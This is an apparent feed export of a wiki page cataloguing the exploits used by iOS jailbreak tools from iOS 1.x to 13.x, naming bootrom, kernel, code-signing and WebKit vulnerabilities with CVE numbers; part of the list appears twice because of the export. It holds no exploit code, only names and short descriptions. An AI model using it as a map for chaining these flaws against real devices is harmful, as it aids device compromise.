* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)&lt;br /&gt;
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])&lt;br /&gt;
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as &amp;quot;steaks4uce&amp;quot;) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
&lt;br /&gt;
== Jailbreak Programs ==&lt;br /&gt;
=== [[PwnageTool]] (2.0 - 5.1.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[redsn0w]] (3.0 - 6.0) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 6.1.2&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 1.x ==&lt;br /&gt;
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===&lt;br /&gt;
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})&lt;br /&gt;
&lt;br /&gt;
=== [[mknod|OktoPrep]] (1.1.2) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.2 from a jailbroken 1.1.1&lt;br /&gt;
* [[mknod]]&lt;br /&gt;
&lt;br /&gt;
=== [[Soft Upgrade]] (1.1.3) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.3 from a running jailbroken 1.1.2&lt;br /&gt;
&lt;br /&gt;
=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
* [[Ramdisk Hack]]&lt;br /&gt;
&lt;br /&gt;
=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 2.x ==&lt;br /&gt;
=== [[QuickPwn]] (2.0 - 2.2.1) ===&lt;br /&gt;
* uses [[Pwnage]] and [[Pwnage 2.0]]&lt;br /&gt;
&lt;br /&gt;
=== [[Redsn0w Lite]] (2.1.1) ===&lt;br /&gt;
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 3.x ==&lt;br /&gt;
=== [[purplera1n]] (3.0) ===&lt;br /&gt;
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===&lt;br /&gt;
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===&lt;br /&gt;
* [[MobileBackup Copy Exploit]]&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[BPF_STX Kernel Write Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 4.x ==&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})&lt;br /&gt;
&lt;br /&gt;
=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3&lt;br /&gt;
* [[ndrv_setspec() Integer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.3 - 4.3.5) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 5.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]])  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Corona|Corona Untether]] (5.0.1)  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (5.0-5.1.1) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 6.x ==&lt;br /&gt;
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2)  ===&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
* [[Shebang Trick]] ({{cve|2013-5154}})&lt;br /&gt;
* [[AMFID code signing evasion]]&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})&lt;br /&gt;
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})&lt;br /&gt;
* [[dynamic memmove() locating]]&lt;br /&gt;
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]&lt;br /&gt;
* [[kernel memory write via ROP gadget]]&lt;br /&gt;
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})&lt;br /&gt;
&lt;br /&gt;
=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===&lt;br /&gt;
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]])&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 7.x ==&lt;br /&gt;
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===&lt;br /&gt;
{{Section Stub}}&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})&lt;br /&gt;
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})&lt;br /&gt;
&lt;br /&gt;
=== [[Geeksn0w]] (7.1 / 7.1.1) ===&lt;br /&gt;
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)&lt;br /&gt;
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu &amp;gt;v1.0.0)&lt;br /&gt;
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})&lt;br /&gt;
* &amp;quot;syslogd chown&amp;quot; vulnerability&lt;br /&gt;
* enterprise certificate (no real exploit, used for initial &amp;quot;unsigned&amp;quot; code execution)&lt;br /&gt;
* &amp;quot;foo_extracted&amp;quot; symlink vulnerability (used to write to /var) ({{cve|2014-4386}})&lt;br /&gt;
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)&lt;br /&gt;
* VoIP backgrounding trick (used to auto restart the app)&lt;br /&gt;
* hidden segment attack&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 8.x ==&lt;br /&gt;
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===&lt;br /&gt;
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)&lt;br /&gt;
* enterprise certificate (inside the IPA)&lt;br /&gt;
* a kind of dylib injection into a system process (see IPA)&lt;br /&gt;
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)&lt;br /&gt;
* a sandboxing problem in debugserver ({{cve|2014-4457}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)&lt;br /&gt;
* enable-dylibs-to-override-cache&lt;br /&gt;
* a new ovelapping segment attack ({{cve|2014-4455}})&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===&lt;br /&gt;
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])&lt;br /&gt;
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache&lt;br /&gt;
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load&lt;br /&gt;
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)&lt;br /&gt;
* MobileStorageMounter exploit ({{cve|2015-1062}})&lt;br /&gt;
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})&lt;br /&gt;
&lt;br /&gt;
Kernel:&lt;br /&gt;
&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===&lt;br /&gt;
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)&lt;br /&gt;
* Symbolic linking to AFC ({{cve|2015-5746}})&lt;br /&gt;
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3802}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3803}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3805}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3806}})&lt;br /&gt;
* IOHIDFamily exploit ({{cve|2015-5774}})&lt;br /&gt;
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})&lt;br /&gt;
&lt;br /&gt;
=== [[EtasonJB]] and [[Home Depot]] (8.4.1) === &lt;br /&gt;
&lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 9.x ==&lt;br /&gt;
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===&lt;br /&gt;
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})&lt;br /&gt;
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables.  ({{cve|2015-7051}})&lt;br /&gt;
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})&lt;br /&gt;
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})&lt;br /&gt;
* Racing KPP for some of the patches.&lt;br /&gt;
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})&lt;br /&gt;
&lt;br /&gt;
=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Home Depot]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
=== [[JailbreakMe 4.0]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Phœnix]] (9.3.5 / 9.3.6) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* mach_port_register Kernel exploit ({{cve|2016-4669}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 10.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===&lt;br /&gt;
&lt;br /&gt;
* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})&lt;br /&gt;
&lt;br /&gt;
=== [[yalu102]] (10.0.1-10.2) ===&lt;br /&gt;
&lt;br /&gt;
* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})&lt;br /&gt;
&lt;br /&gt;
=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[Meridian]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})&lt;br /&gt;
&lt;br /&gt;
=== [[H3lix]] (10.0.1 - 10.3.4) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 11.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2 &lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
===[[Electra]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* v1ntex ({{cve|2019-6225}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 12.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Chimera]] (12.0 - 12.2 / 12.4)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
12.4.1&lt;br /&gt;
&lt;br /&gt;
* AppleAVE2Driver exploit ({{cve|2019-8795}})&lt;br /&gt;
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})&lt;br /&gt;
&lt;br /&gt;
12.4.2 - 12.4.8&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{CVE|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (12.3 - 12.4.7)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 13.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (13.0 - 13.5)===&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.3 (before version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{cve|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.5 (since version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* tachy0n (LightSpeed) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (13.0 - 13.5)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=106037</id>
		<title>Jailbreak Exploits</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=106037"/>
		<updated>2020-07-26T01:13:07Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page lists the '''exploits''' used in [[jailbreak]]s.&lt;br /&gt;
&lt;br /&gt;
== Common exploits ==&lt;br /&gt;
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.&lt;br /&gt;
&lt;br /&gt;
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])&lt;br /&gt;
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)&lt;br /&gt;
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])&lt;br /&gt;
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as &amp;quot;steaks4uce&amp;quot;) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
&lt;br /&gt;
== Jailbreak Programs ==&lt;br /&gt;
=== [[PwnageTool]] (2.0 - 5.1.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[redsn0w]] (3.0 - 6.0) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 6.1.2&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 1.x ==&lt;br /&gt;
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===&lt;br /&gt;
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})&lt;br /&gt;
&lt;br /&gt;
=== [[mknod|OktoPrep]] (1.1.2) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.2 from a jailbroken 1.1.1&lt;br /&gt;
* [[mknod]]&lt;br /&gt;
&lt;br /&gt;
=== [[Soft Upgrade]] (1.1.3) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.3 from a running jailbroken 1.1.2&lt;br /&gt;
&lt;br /&gt;
=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
* [[Ramdisk Hack]]&lt;br /&gt;
&lt;br /&gt;
=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 2.x ==&lt;br /&gt;
=== [[QuickPwn]] (2.0 - 2.2.1) ===&lt;br /&gt;
* uses [[Pwnage]] and [[Pwnage 2.0]]&lt;br /&gt;
&lt;br /&gt;
=== [[Redsn0w Lite]] (2.1.1) ===&lt;br /&gt;
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 3.x ==&lt;br /&gt;
=== [[purplera1n]] (3.0) ===&lt;br /&gt;
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===&lt;br /&gt;
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===&lt;br /&gt;
* [[MobileBackup Copy Exploit]]&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
